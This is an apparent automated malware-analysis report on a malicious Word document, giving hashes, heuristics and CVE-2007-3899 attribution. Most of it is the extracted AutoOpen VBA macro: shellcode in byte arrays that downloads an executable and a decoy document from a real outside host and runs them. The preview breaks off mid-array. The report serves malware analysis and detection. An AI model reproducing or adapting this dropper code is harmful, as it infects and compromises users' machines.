Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4135f92055dba1fe…

MALICIOUS

Office (OLE)

236.5 KB Created: 2018-10-15 23:10:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: a82cdb9f5bffcb24708e66eb52cce2af SHA-1: 8106a30bd35526bded384627d8eebce15da35d17 SHA-256: 4135f92055dba1fedafe70a8e094623889a2a53f173a8913b016667e5bc7d264
270 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that exploits CVE-2007-3899, a memory corruption vulnerability. The AutoOpen macro uses VBA to call Windows APIs like VirtualAlloc, LoadLibraryA, and GetProcAddress, indicating it's designed to load and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Prince-6923178-0' further supports its role as a dropper.

Heuristics 9

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Dropper.Prince-6923178-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Prince-6923178-0
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    '``````````````````````````````````````````````````````````````````````````````````
    Sub AutoOpen()
        On Error GoTo LoneSpirit
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21350 bytes
SHA-256: c35197a45a24c685429d45496d00efff9065dae1e9140180346b5e40e9fe3629
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function SharpShooter Lib "msvcrt" Alias "_beginthread" (ByVal StartAddress As LongPtr, StackSize As Long, ByVal ArgList As LongPtr) As Long
Private Declare PtrSafe Function efasdv Lib "kernel32" Alias "VirtualAlloc" (ByVal address As Long, ByVal size As Long, ByVal aloctype As Long, ByVal fprot As Long) As LongPtr
Private Declare PtrSafe Function gzsdfasd Lib "kernel32" Alias "RtlMoveMemory" (ByVal dest As LongPtr, ByRef src As Any, ByVal dlen As Long) As LongPtr
Private Declare PtrSafe Function ennfiaje Lib "kernel32" Alias "LoadLibraryA" (ByVal libname As String) As LongPtr
Private Declare PtrSafe Function dnnaigej Lib "kernel32" Alias "GetProcAddress" (ByVal module As LongPtr, ByVal pname As String) As LongPtr
'``````````````````````````````````````````````````````````````````````````````````
Sub AutoOpen()
    On Error GoTo LoneSpirit
'``````````````````````````````````````````````````````````````````````````````````

Dim BlockCount As Long, yefawfq As Long
BlockCount = 3
yefawfq = 3224
Dim llsodiplo(2) As Variant
Dim grqwasf(3224) As Byte

llsodiplo(0) = Array(&H48, &H81, &HEC, &HD8, &H4, &H0, &H0, &HC6, &H84, &H24, &HC8, &H1, &H0, &H0, &H75, &HC6, &H84, &H24, &HC9, &H1, &H0, &H0, &H72, &HC6, &H84, &H24, &HCA, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HCB, &H1, &H0, &H0, &H6D, &HC6, &H84, &H24, &HCC, &H1, &H0, &H0, &H6F, &HC6, &H84, &H24, &HCD, &H1, &H0, &H0, &H6E, &HC6, &H84, &H24, &HCE, &H1, &H0, &H0, &H2E, &HC6, &H84, &H24, &HCF, &H1, &H0, &H0, &H64, &HC6, &H84, &H24, &HD0, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HD1, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HD2, &H1, &H0, &H0, &H0, &HC6, &H84, &H24, &HB0, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &HB1, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &HB2, &H3, &H0, &H0, &H66, &HC6, &H84, &H24, &HB3, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HB4, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, _
&HB5, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HB6, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &HB7, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HB8, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HB9, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HBA, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HBB, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HBC, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H70, &H6E, &HC6, &H44, &H24, &H71, &H74, &HC6, &H44, &H24, &H72, &H64, &HC6, &H44, &H24, &H73, &H6C, &HC6, &H44, &H24, &H74, &H6C, &HC6, &H44, &H24, &H75, &H2E, &HC6, &H44, &H24, &H76, &H64, &HC6, &H44, &H24, &H77, &H6C, &HC6, &H44, &H24, &H78, &H6C, &HC6, &H44, &H24, &H79, &H0, &HC6, &H84, &H24, &H20, &H4, &H0, &H0, &H6B, &HC6, &H84, &H24, &H21, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H22, &H4, &H0, &H0, &H72, &HC6, &H84, _
&H24, &H23, &H4, &H0, &H0, &H6E, &HC6, &H84, &H24, &H24, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H25, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H26, &H4, &H0, &H0, &H33, &HC6, &H84, &H24, &H27, &H4, &H0, &H0, &H32, &HC6, &H84, &H24, &H28, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &H29, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H2A, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H2B, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H2C, &H4, &H0, &H0, &H0, &HC6, &H44, &H24, &H60, &H73, &HC6, &H44, &H24, &H61, &H68, &HC6, &H44, &H24, &H62, &H65, &HC6, &H44, &H24, &H63, &H6C, &HC6, &H44, &H24, &H64, &H6C, &HC6, &H44, &H24, &H65, &H33, &HC6, &H44, &H24, &H66, &H32, &HC6, &H44, &H24, &H67, &H0, &HC6, &H84, &H24, &HD8, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &HD9, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, _
&HDA, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HDB, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HDC, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &HDD, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HDE, &H3, &H0, &H0, &H62, &HC6, &H84, &H24, &HDF, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HE0, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HE1, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HE2, &H3, &H0, &H0, &H79, &HC6, &H84, &H24, &HE3, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &HE4, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &H10, &H4, &H0, &H0, &H47, &HC6, &H84, &H24, &H11, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H12, &H4, &H0, &H0, &H74, &HC6, &H84, &H24, &H13, &H4, &H0, &H0, &H50, &HC6, &H84, &H24, &H14, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H15, &H4, &H0, &H0, &H6F, &HC6, &H84, &H24, &H16, _
&H4, &H0, &H0, &H63, &HC6, &H84, &H24, &H17, &H4, &H0, &H0, &H41, &HC6, &H84, &H24, &H18, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H19, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H1A, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H1B, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H1C, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H1D, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H1E, &H4, &H0, &H0, &H0, &HC6, &H84, &H24, &H98, &H3, &H0, &H0, &H55, &HC6, &H84, &H24, &H99, &H3, &H0, &H0, &H52, &HC6, &H84, &H24, &H9A, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &H9B, &H3, &H0, &H0, &H44, &HC6, &H84, &H24, &H9C, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H9D, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H9E, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H9F, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HA0, &H3, _
&H0, &H0, &H6F, &HC6, &H84, &H24, &HA1, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HA2, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HA3, &H3, &H0, &H0, &H54, &HC6, &H84, &H24, &HA4, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HA5, &H3, &H0, &H0, &H46, &HC6, &H84, &H24, &HA6, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HA7, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HA8, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &HA9, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &HAA, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &H50, &H3, &H0, &H0, &H53, &HC6, &H84, &H24, &H51, &H3, &H0, &H0, &H48, &HC6, &H84, &H24, &H52, &H3, &H0, &H0, &H47, &HC6, &H84, &H24, &H53, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H54, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H55, &H3, &H0, &H0, &H46, &HC6, &H84, &H24, &H56, &H3, &H0, _
&H0, &H6F, &HC6, &H84, &H24, &H57, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H58, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &H59, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H5A, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H5B, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H5C, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H5D, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H5E, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &H5F, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &H60, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H58, &H73, &HC6, &H44, &H24, &H59, &H74, &HC6, &H44, &H24, &H5A, &H72, &HC6, &H44, &H24, &H5B, &H63, &HC6, &H44, &H24, &H5C, &H70, &HC6, &H44, &H24, &H5D, &H79, &HC6, &H44, &H24, &H5E, &H0, &HC6, &H84, &H24, &HB8, &H1, &H0, &H0, &H73, &HC6, &H84, &H24, &HB9, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HBA, _
&H1, &H0, &H0, &H72, &HC6, &H84, &H24, &HBB, &H1, &H0, &H0, &H63, &HC6, &H84, &H24, &HBC, &H1, &H0, &H0, &H61, &HC6, &H84, &H24, &HBD, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HBE, &H1, &H0, &H0, &H0, &HC6, &H84, &H24, &H88, &H3, &H0, &H0, &H43, &HC6, &H84, &H24, &H89, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H8A, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H8B, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H8C, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H8D, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H8E, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H8F, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H90, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H91, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H92, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H93, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H94, &H3, _
&H0, &H0, &H73, &HC6, &H84, &H24, &H95, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &H96, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H50, &H6D, &HC6, &H44, &H24, &H51, &H65, &HC6, &H44, &H24, &H52, &H6D, &HC6, &H44, &H24, &H53, &H73, &HC6, &H44, &H24, &H54, &H65, &HC6, &H44, &H24, &H55, &H74, &HC6, &H44, &H24, &H56, &H0, &HC6, &H84, &H24, &HA8, &H1, &H0, &H0, &H53, &HC6, &H84, &H24, &HA9, &H1, &H0, &H0, &H68, &HC6, &H84, &H24, &HAA, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HAB, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HAC, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HAD, &H1, &H0, &H0, &H45, &HC6, &H84, &H24, &HAE, &H1, &H0, &H0, &H78, &HC6, &H84, &H24, &HAF, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HB0, &H1, &H0, &H0, &H63, &HC6, &H84, &H24, &HB1, &H1, &H0, &H0, &H75, &HC6, &H84, &H24, _
&HB2, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HB3, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HB4, &H1, &H0, &H0, &H41, &HC6, &H84, &H24, &HB5, &H1, &H0, &H0, &H0, &H48, &HB8, &H81, &H88, &H88, &H88, &H88, &H88, &HAD, &HDE, &H48, &H89, &H84, &H24, &H80, &H0, &H0, &H0)
llsodiplo(1) = Array(&H48, &HB8, &H82, &H88, &H88, &H88, &H88, &H88, &HAD, &HDE, &H48, &H89, &H84, &H24, &HA0, &H1, &H0, &H0, &H48, &H8D, &H8C, &H24, &HC8, &H1, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H98, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H44, &H24, &H68, &H48, &H8D, &H8C, &H24, &HB0, &H3, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H50, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H54, &H24, &H58, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HC0, &H1, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, _
&H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HB8, &H1, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &H70, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &H20, &H4, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H88, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &H68, &H3, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H54, &H24, &H50, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HC8, &H3, &H0, &H0, &H48, &H8D, &H4C, &H24, &H60, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HA8, &H1, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, _
&H0, &H48, &H89, &H84, &H24, &HC0, &H3, &H0, &H0, &HC6, &H84, &H24, &HE8, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &HE9, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &HEA, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &HEB, &H3, &H0, &H0, &H70, &HC6, &H84, &H24, &HEC, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &HED, &H3, &H0, &H0, &H3A, &HC6, &H84, &H24, &HEE, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &HEF, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &HF0, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF1, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF2, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF3, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HF4, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &HF5, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HF6, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &HF7, &H3, &H0, &H0, &H67, _
&HC6, &H84, &H24, &HF8, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &HF9, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HFA, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HFB, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HFC, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HFD, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &HFE, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HFF, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H0, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &H1, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H2, &H4, &H0, &H0, &H67, &HC6, &H84, &H24, &H3, &H4, &H0, &H0, &H2F, &HC6, &H84, &H24, &H4, &H4, &H0, &H0, &H71, &HC6, &H84, &H24, &H5, &H4, &H0, &H0, &H75, &HC6, &H84, &H24, &H6, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H7, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H8, &H4, &H0, &H0, &H79, &HC6, _
&H84, &H24, &H9, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &HA, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HB, &H4, &H0, &H0, &H68, &HC6, &H84, &H24, &HC, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HD, &H4, &H0, &H0, &H0, &HC6, &H84, &H24, &H78, &H3, &H0, &H0, &H5C, &HC6, &H84, &H24, &H79, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H7A, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H7B, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H7C, &H3, &H0, &H0, &H79, &HC6, &H84, &H24, &H7D, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H7E, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H7F, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H80, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H81, &H3, &H0, &H0, &H78, &HC6, &H84, &H24, &H82, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H83, &H3, &H0, &H0, &H0, &H48, &H8D, _
&H84, &H24, &HE0, &H1, &H0, &H0, &H48, &H89, &H44, &H24, &H20, &H45, &H33, &HC9, &H45, &H33, &HC0, &HBA, &H7, &H0, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &H78, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &HE0, &H1, &H0, &H0, &HFF, &H94, &H24, &H70, &H3, &H0, &H0, &HC6, &H84, &H24, &H10, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &H11, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H12, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H13, &H3, &H0, &H0, &H70, &HC6, &H84, &H24, &H14, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H15, &H3, &H0, &H0, &H3A, &HC6, &H84, &H24, &H16, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H17, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H18, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H19, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, _
&H1A, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H1B, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H1C, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &H1D, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H1E, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H1F, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H20, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &H21, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H22, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H23, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H24, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H25, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H26, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H27, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H28, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H29, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H2A, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H2B, _
&H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H2C, &H3, &H0, &H0, &H53, &HC6, &H84, &H24, &H2D, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H2E, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H2F, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H30, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H31, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H32, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H33, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H34, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H35, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H36, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H37, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H38, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H39, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H3A, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H3B, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H3C, &H3, _
&H0, &H0, &H6E, &HC6, &H84, &H24, &H3D, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H3E, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H3F, &H3, &H0, &H0, &H4D, &HC6, &H84, &H24, &H40, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H41, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H42, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H43, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H44, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H45, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H46, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H47, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &H48, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H49, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H4A, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &HF0, &H2, &H0, &H0, &H5C, &HC6, &H84, &H24, &HF1, &H2, &H0, &H0, &H53, &HC6, &H84, &H24, &HF2, &H2, &H0, _
&H0, &H74, &HC6, &H84, &H24, &HF3, &H2, &H0, &H0, &H72, &HC6, &H84, &H24, &HF4, &H2, &H0, &H0, &H61, &HC6, &H84, &H24, &HF5, &H2, &H0, &H0, &H74, &HC6, &H84, &H24, &HF6, &H2, &H0, &H0, &H65, &HC6, &H84, &H24, &HF7, &H2, &H0, &H0, &H67, &HC6, &H84, &H24, &HF8, &H2)
llsodiplo(2) = Array(&H0, &H0, &H69, &HC6, &H84, &H24, &HF9, &H2, &H0, &H0, &H63, &HC6, &H84, &H24, &HFA, &H2, &H0, &H0, &H20, &HC6, &H84, &H24, &HFB, &H2, &H0, &H0, &H50, &HC6, &H84, &H24, &HFC, &H2, &H0, &H0, &H6C, &HC6, &H84, &H24, &HFD, &H2, &H0, &H0, &H61, &HC6, &H84, &H24, &HFE, &H2, &H0, &H0, &H6E, &HC6, &H84, &H24, &HFF, &H2, &H0, &H0, &H6E, &HC6, &H84, &H24, &H0, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H1, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H2, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H3, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H4, &H3, &H0, &H0, &H4D, &HC6, &H84, &H24, &H5, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H6, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H7, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H8, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H9, &H3, &H0, &H0, _
&H65, &HC6, &H84, &H24, &HA, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HB, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HC, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HD, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HE, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &HF, &H3, &H0, &H0, &H0, &H48, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H89, &H44, &H24, &H20, &H45, &H33, &HC9, &H45, &H33, &HC0, &HBA, &H1C, &H0, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &HF0, &H2, &H0, &H0, &H48, &H8D, &H8C, &H24, &H90, &H0, &H0, &H0, &HFF, &H94, &H24, &H70, &H3, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &HE0, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &HE8, &H3, &H0, &H0, &H33, &HC9, &HFF, &H54, _
&H24, &H68, &H89, &H84, &H24, &HD0, &H3, &H0, &H0, &H83, &HBC, &H24, &HD0, &H3, &H0, &H0, &H0, &HF, &H8C, &HA1, &H0, &H0, &H0, &HC7, &H84, &H24, &H50, &H4, &H0, &H0, &H68, &H0, &H0, &H0, &HC7, &H84, &H24, &H8C, &H4, &H0, &H0, &H1, &H0, &H0, &H0, &H33, &HC0, &H66, &H89, &H84, &H24, &H90, &H4, &H0, &H0, &H41, &HB8, &H68, &H0, &H0, &H0, &H33, &HD2, &H48, &H8D, &H8C, &H24, &H50, &H4, &H0, &H0, &HFF, &H94, &H24, &HC8, &H3, &H0, &H0, &H41, &HB8, &H18, &H0, &H0, &H0, &H33, &HD2, &H48, &H8D, &H8C, &H24, &H30, &H4, &H0, &H0, &HFF, &H94, &H24, &HC8, &H3, &H0, &H0, &H48, &H8D, &H84, &H24, &H30, &H4, &H0, &H0, &H48, &H89, &H44, &H24, &H48, &H48, &H8D, &H84, &H24, &H50, &H4, &H0, &H0, &H48, &H89, &H44, &H24, &H40, &H48, &HC7, &H44, &H24, &H38, &H0, &H0, &H0, &H0, &H48, _
